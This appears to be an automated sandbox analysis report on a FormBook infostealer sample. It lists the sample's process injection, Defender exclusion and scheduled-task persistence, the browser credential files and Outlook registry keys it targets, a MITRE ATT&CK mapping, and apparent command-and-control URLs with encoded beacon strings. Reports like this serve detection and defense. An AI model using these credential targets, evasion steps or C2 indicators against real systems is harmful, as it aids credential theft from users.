            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		221
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1454436 Sample: CFV20240600121.exe Startdate: 10/06/2024 Architecture: WINDOWS Score: 100 59 www.mg55aa.xyz 2->59 61 www.zhuan-tou.com 2->61 63 17 other IPs or domains 2->63 71 Snort IDS alert for network traffic 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Antivirus detection for URL or domain 2->75 79 8 other signatures 2->79 10 CFV20240600121.exe 7 2->10         started        signatures3 77 Performs DNS queries to domains with low reputation 59->77 process4 file5 51 C:\Users\user\AppData\...\BPSHhDGmARC.exe, PE32 10->51 dropped 53 C:\Users\...\BPSHhDGmARC.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\Temp\tmpA2C.tmp, XML 10->55 dropped 57 C:\Users\user\...\CFV20240600121.exe.log, ASCII 10->57 dropped 91 Uses schtasks.exe or at.exe to add and modify task schedules 10->91 93 Adds a directory exclusion to Windows Defender 10->93 95 Injects a PE file into a foreign processes 10->95 14 CFV20240600121.exe 10->14         started        17 BPSHhDGmARC.exe 5 10->17         started        19 powershell.exe 23 10->19         started        21 5 other processes 10->21 signatures6 process7 signatures8 97 Maps a DLL or memory area into another process 14->97 23 RLaIKKYKtFdTMrMFejOcvZaAxPi.exe 14->23 injected 99 Multi AV Scanner detection for dropped file 17->99 101 Machine Learning detection for dropped file 17->101 103 Injects a PE file into a foreign processes 17->103 26 schtasks.exe 1 17->26         started        28 BPSHhDGmARC.exe 17->28         started        30 BPSHhDGmARC.exe 17->30         started        105 Loading BitLocker PowerShell Module 19->105 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 21->38         started        process9 signatures10 81 Found direct / indirect Syscall (likely to bypass EDR) 23->81 40 write.exe 13 23->40         started        43 conhost.exe 26->43         started        process11 signatures12 83 Tries to steal Mail credentials (via file / registry access) 40->83 85 Tries to harvest and steal browser information (history, passwords, etc) 40->85 87 Modifies the context of a thread in another process (thread injection) 40->87 89 3 other signatures 40->89 45 RLaIKKYKtFdTMrMFejOcvZaAxPi.exe 40->45 injected 49 firefox.exe 40->49         started        process13 dnsIp14 65 www.zhuan-tou.com 103.120.80.111, 51407, 51408, 51409 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 45->65 67 www.am1-728585.com 101.36.121.143, 49717, 51391, 51392 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK China 45->67 69 12 other IPs or domains 45->69 107 Found direct / indirect Syscall (likely to bypass EDR) 45->107 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            CFV20240600121.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic
            CFV20240600121.exe42%VirustotalBrowse
            CFV20240600121.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            td-ccm-neg-87-45.wixdns.net0%VirustotalBrowse
            www.am1-728585.com1%VirustotalBrowse
            www.zhuan-tou.com1%VirustotalBrowse
            www.witoharmuth.com0%VirustotalBrowse
            www.magnoliahairandco.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
            http://www.ie8mce.website/3osa/0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%VirustotalBrowse
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://www.witoharmuth.de/verkehrswende/0%Avira URL Cloudsafe
            http://www.mg55aa.xyz/2c61/?TTv82Lg=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&kH=00U8ENLHk0%Avira URL Cloudsafe
            https://themeisle.com0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%VirustotalBrowse
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%VirustotalBrowse
            https://www.witoharmuth.de/verkehrswende/0%VirustotalBrowse
            http://www.onelook.com/?w=0%Avira URL Cloudsafe
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            http://www.onelook.com/?w=2%VirustotalBrowse
            https://www.west.cn/services/mail/0%Avira URL Cloudsafe
            https://www.witoharmuth.de/kontakt/0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.210%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%Avira URL Cloudsafe
            https://track.uc.cn/collect0%VirustotalBrowse
            https://www.witoharmuth.de/kontakt/0%VirustotalBrowse
            https://themeisle.com0%VirustotalBrowse
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.20%Avira URL Cloudsafe
            https://www.west.cn/services/mail/0%VirustotalBrowse
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.210%VirustotalBrowse
            http://www.webuyfontana.com/fhu0/0%Avira URL Cloudsafe
            https://js.users.51.la/21876343.js0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.20%VirustotalBrowse
            http://www.lecoinsa.net/xu8t/0%Avira URL Cloudsafe
            http://www.binpvae.lol/a472/0%Avira URL Cloudsafe
            http://www.shrongcen.com/5965/?TTv82Lg=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&kH=00U8ENLHk0%Avira URL Cloudsafe
            https://www.witoharmuth.de/feed/0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%VirustotalBrowse
            http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)0%Avira URL Cloudsafe
            https://js.users.51.la/21876343.js3%VirustotalBrowse
            http://www.witoharmuth.com/jd4u/0%Avira URL Cloudsafe
            http://www.duzane.com/6tsi/0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
            http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)0%VirustotalBrowse
            http://www.zhuan-tou.com/lx5p/?TTv82Lg=syyr9ehUh5Dik7pm/3o58LEiuz6t5Qsxa3AqbpTiKXwTN4MFTP1/ruYiG066Pw0RpEGKYU+Xmw7DJuAgJs5fVEIr+ru5VK8zeO7ugFBDIhF/xAum4x9tUt/OQm4f5IJVQQ==&kH=00U8ENLHk0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db20%Avira URL Cloudsafe
            https://www.witoharmuth.de/feed/0%VirustotalBrowse
            http://www.lunareafurniture.com0%Avira URL Cloudsafe
            http://www.witoharmuth.com/jd4u/0%VirustotalBrowse
            https://hm.baidu.com/hm.js?0%VirustotalBrowse
            http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a720%Avira URL Cloudsafe
            https://www.west.cn/cloudhost/0%Avira URL Cloudsafe
            http://www.shrongcen.com/5965/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://www.witoharmuth.de/sample-page/0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%VirustotalBrowse
            https://www.west.cn/cloudhost/0%VirustotalBrowse
            http://www.witoharmuth.com/jd4u/?TTv82Lg=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&kH=00U8ENLHk0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%VirustotalBrowse
            http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);0%VirustotalBrowse
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
            https://www.witoharmuth.de/sample-page/0%VirustotalBrowse
            https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a720%VirustotalBrowse
            https://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.10%Avira URL Cloudsafe
            http://www.ie8mce.website/3osa/?kH=00U8ENLHk&TTv82Lg=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg==0%Avira URL Cloudsafe
            https://www.witoharmuth.de/xmlrpc.php?rsd0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%VirustotalBrowse
            https://www.witoharmuth.de/comments/feed/0%Avira URL Cloudsafe
            http://www.am1-728585.com/9yv1/?kH=00U8ENLHk&TTv82Lg=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ==0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://www.west.cn/services/webhosting/0%Avira URL Cloudsafe
            http://www.webuyfontana.com/0%Avira URL Cloudsafe
            http://www.chowzen.top/fv92/?TTv82Lg=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&kH=00U8ENLHk0%Avira URL Cloudsafe
            http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/js/bootstrap.min.js?ver=1.0.20%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-includes/css/dist/block-library/style.min.css?ver=6.5.40%Avira URL Cloudsafe
